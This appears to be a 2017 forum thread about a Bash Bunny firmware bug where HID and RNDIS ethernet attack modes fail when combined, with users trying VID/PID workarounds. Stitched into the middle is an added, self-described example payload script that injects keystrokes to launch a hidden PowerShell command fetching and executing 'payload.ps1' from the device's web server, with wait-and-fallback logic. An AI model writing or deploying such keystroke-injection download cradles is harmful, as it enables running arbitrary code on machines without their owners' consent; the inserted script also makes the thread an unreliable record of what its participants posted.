Dave-ee Jones, posted April 19, 2017:

Yes, I know I myself have addressed this issue on numerous other posts, but this is slightly different... I want to use this line (tried either one):

ATTACKMODE RNDIS_ETHERNET HID
or
ATTACKMODE HID RNDIS_ETHERNET

However, I get the issue where the ethernet adapter doesn't start up, and therefore the PC doesn't get an IP and doesn't even show it is connected on another network (usually "Network 2"). I would usually address this issue and say "Just swap ATTACKMODEs when you need to", but in this instance I cannot. I need to use a HID attack WHILE I am hosting a webserver over ethernet, which I cannot do because of the silly "One Attack at a Time, People!" bug. A fix would be good :)
Sebkinne, posted April 19, 2017 (in reply to Dave-ee Jones' post above, 1 hour earlier):

A fix is in the works for v1.3. Firmware v1.2 is currently undergoing some last testing.
Dave-ee Jones (author), posted April 20, 2017:

Sebkinne wrote (19 hours earlier): "A fix is in the works for v1.3. Firmware v1.2 is currently undergoing some last testing."

Eh? I thought it was being fixed in 1.2?
PoSHMagiC0de, posted April 26, 2017:

Yeah, noticed this bug too. I wanted to do the combo, but it looks like it doesn't find drivers for the NIC if you use it with another mode. Notice that in the load mode the serial is not recognized either.

Using HID and ethernet together is something I am waiting for too. It will make the BBTPS I have built more responsive: instead of a download cradle having to check for when the server is available, I could launch the HID when the IP is available, leaving just the load time for the JS server, which is very quick. From what I see, it takes longer for the attack mode to switch. Waiting for the Target and Host IP to be available would fix waiting for the drivers to install and whatnot.
HeavenknowsItried, posted April 26, 2017:

@Sebkinne Do you fix it by changing the rndis kernel driver, or work around it by ATTACKMODE RNDIS first, then HID + RNDIS?
PoSHMagiC0de, posted April 27, 2017:

I think the issue is not that it is missing initialization, but that when used in combination the rndis is not seen as the standard IBM device anymore and takes on another ID. One thing I can try is the PID/VID options: get the device ID from the known driver and see if they can be spoofed to work in combination. Hmmm, will have to try tomorrow morning, unless someone gets the bug and beats me to it before then and finds out. :-P
PoSHMagiC0de, posted April 27, 2017:

Welp, I know you can get HID ECM_ETHERNET to work with the below command and VID. I used the VID that came up in Linux lsusb for the device in ECM_ETHERNET mode:

ATTACKMODE HID ECM_ETHERNET VID_0XF000 PID_0XFF13

Windows with HID RNDIS_ETHERNET is no joy no matter what I try. Notice that the device, when run by itself, doesn't match any of the devices in the wiki list. In Windows it comes up as:

VID_0X04B3 PID_0X4010

I tried to append that on at the end, since when I did HID RNDIS_ETHERNET it was the ethernet that was off, but then the opposite happened: the ethernet came on but HID never works. In Linux under lsusb I only see the 1 device, which is the one above for ECM. In Windows I see the same, as 1 device comes up, but the QUACK commands I have in place to test never type out. In fact it seems to stick with the light after the ATTACKMODE, before the QUACK commands, which makes me think QUACK is getting stuck because the HID mode driver never loads for some reason. Conflict?

Just for kicks I did the ECM one on Windows and the expected happened: no drivers for the CDC_ECM, but the keyboard did type. I wonder if there is a CDC_ECM driver built into Windows; if I get the device ID of that, I wonder if the dual command will work without having to load drivers.
Dave-ee Jones (author), posted April 28, 2017 (in reply to PoSHMagiC0de's post of April 26, 2017 above):

Indeed. It would significantly help my case, as I'm trying to use some PowerShell commands that require the Bunny to have ethernet mode on.
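The sequencing PoSHMagiC0de describes (bring up ethernet alongside HID, then launch the HID stage only once the target has actually pulled an IP from the Bunny, instead of a download cradle polling for the server) as a payload skeleton. This is an added example, not code from the thread or from Hak5. It assumes the Bash Bunny payload commands ATTACKMODE, GET, LED and Q as documented for firmware 1.x (`GET TARGET_IP` and `GET HOST_IP` fill `$TARGET_IP` and `$HOST_IP`), a hypothetical `payload.ps1` served from the Bunny's web server, and, in the off-device stubs, the Bunny's default host address 172.16.64.1. Because the combined mode is exactly what this thread reports as broken, the skeleton treats "ethernet never comes up" as a first-class outcome: the wait times out and the payload drops back to HID-only rather than typing a cradle at a network that does not exist.

```bash
#!/bin/bash
# Added example (not from the thread): payload skeleton that starts
# HID + RNDIS_ETHERNET together, waits for the target to obtain an IP,
# and only then runs the HID stage. If ethernet never comes up, it
# falls back to HID-only.
#
# Assumptions: ATTACKMODE, GET, LED and Q as in Bash Bunny firmware 1.x;
# GET TARGET_IP sets $TARGET_IP, GET HOST_IP sets $HOST_IP.

ON_BUNNY=0
command -v ATTACKMODE >/dev/null 2>&1 && ON_BUNNY=1

# Off-device stubs so the logic can be dry-run on a workstation.
if [ "$ON_BUNNY" -eq 0 ]; then
    ATTACKMODE() { printf 'ATTACKMODE %s\n' "$*"; }
    LED()        { printf 'LED %s\n' "$*"; }
    Q()          { printf 'Q %s\n' "$*"; }
    GET() {
        case "$1" in
            HOST_IP)   HOST_IP="172.16.64.1" ;;  # constructed: Bunny default
            TARGET_IP) TARGET_IP="" ;;           # simulates ethernet never up
        esac
    }
fi

# is_usable_ip ADDR: true when ADDR is a dotted quad other than 0.0.0.0.
is_usable_ip() {
    case "$1" in
        ''|0.0.0.0) return 1 ;;
        *[!0-9.]*)  return 1 ;;
    esac
    local IFS=. n=0 octet
    for octet in $1; do
        [ -n "$octet" ] && [ "$octet" -le 255 ] || return 1
        n=$((n + 1))
    done
    [ "$n" -eq 4 ]
}

# wait_for_target_ip MAX_TRIES INTERVAL: poll GET TARGET_IP until the
# target holds an address. Returns 0 (address left in $TARGET_IP) or
# 1 when MAX_TRIES polls pass without one.
wait_for_target_ip() {
    local tries=0 max="${1:-30}" interval="${2:-1}"
    while [ "$tries" -lt "$max" ]; do
        GET TARGET_IP
        if is_usable_ip "$TARGET_IP"; then
            return 0
        fi
        tries=$((tries + 1))
        sleep "$interval"
    done
    return 1
}

run_payload() {
    LED SETUP
    ATTACKMODE HID RNDIS_ETHERNET

    if wait_for_target_ip 30 1; then
        # Target is on the Bunny's network: the HID stage can reference
        # the Bunny-hosted server. payload.ps1 is a hypothetical name.
        LED ATTACK
        GET HOST_IP
        Q GUI r
        Q DELAY 500
        Q STRING "powershell -w h -c \"iwr http://$HOST_IP/payload.ps1 | iex\""
        Q ENTER
        LED FINISH
        return 0
    fi

    # Ethernet never came up (the failure reported in this thread).
    # Switch to HID-only so the keyboard stage still runs.
    LED R
    ATTACKMODE HID
    Q STRING "echo ethernet stage unavailable"
    Q ENTER
    return 1
}

if [ "$ON_BUNNY" -eq 1 ]; then
    run_payload
fi
```

Run off-device, nothing is executed beyond the function definitions, so the wait and fallback logic can be checked on a workstation with a stubbed GET before the payload ever goes on the Bunny. The thirty one-second polls are a budget for Windows to finish installing the RNDIS driver and pull a lease; shorten it once you know how long your target takes.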
Dave-ee Jones (author), posted May 1, 2017 (edited May 1, 2017 by Dave-ee Jones):

Soooooo.... BUMP! :P

Has anyone got any temporary fixes for this? This issue is the bane of my payload right now... Checked the Hardware IDs of my Bash Bunny, and I'm getting these: VID_F000 & PID_FFF0, along with a REV and MI ID as well. Can I spoof the HID/RNDIS attack using these or no?
Sebkinne, posted May 1, 2017 (in reply to Dave-ee Jones' post above, 44 minutes earlier):

Depending on what I hear from Darren today, we'll either release 1.2 and 1.3-RC1 (with this issue hopefully fixed), or roll it all into 1.3 and release that. Keep an eye out for the new thread.
Dave-ee Jones (author), posted May 1, 2017:

Sebkinne wrote (1 minute earlier): "Depending on what I hear from Darren today, we'll either release 1.2 and 1.3-RC1 (with this issue hopefully fixed), or roll it all into 1.3 and release that. Keep an eye out for the new thread."

Sounds good. I will keep an eye out for it.